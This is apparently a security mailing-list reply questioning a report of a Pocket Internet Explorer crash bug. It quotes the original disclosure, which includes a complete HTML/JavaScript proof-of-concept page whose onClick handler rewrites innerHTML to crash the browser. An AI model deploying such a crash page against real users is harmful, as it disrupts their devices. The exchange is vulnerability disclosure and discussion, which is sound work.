Can you be specific about what version of PIE you tested this vulnerability on?

If you look at the following web pages you will see that PIE only supports a
few HTML tags.

http://support.microsoft.com/default.aspx?scid=kb;en-us;Q161319
http://support.microsoft.com/default.aspx?scid=kb;EN-US;158479

Specifically the <SCRIPT> tag is not supported in PIE 1.0, 1.1 and 2.0. Only
PIE 3.0 supports the <SCRIPT> tag.

Does PIE 3.0 crash?

> PROBLEM DESCRIPTION:
> Calling a javascript from an object written to same page with the
> object.innerHTML function causes Pocket Internet Explorer (PIE from now
> on)
> to crash.
>
> SOFTWARE AFFECTED:
> Only PIE is affected, "regular" IE will show the pages as intented.
>
> EXAMPLE:
> <html>
> <head>
> <title>Crash PIE</title>
> <script language="Javascript">
> function displayPage(page){
> if(page=="onload"){
> main.innerHTML="<a href=\"#\"
> onClick=\"displayPage('crash');\">Crash
> me</a>";
> }
> if(page=="crash"){
> main.innerHTML="<a href=\"#\" onClick=\"displayPage('crash');\">You
> are
> going down!</a>";
> }
> }
> </script>
> </head>
> <body onLoad="displayPage('onload');">
> <hr>
> <span id="main"></span>
> </body></html>
>
> SOLUTIONS:
> no known patch available
>
>
> Problem was reported to MS (Norway) 2nd of January 2003.
>
>
> Chris
>
>
>

[ reply ]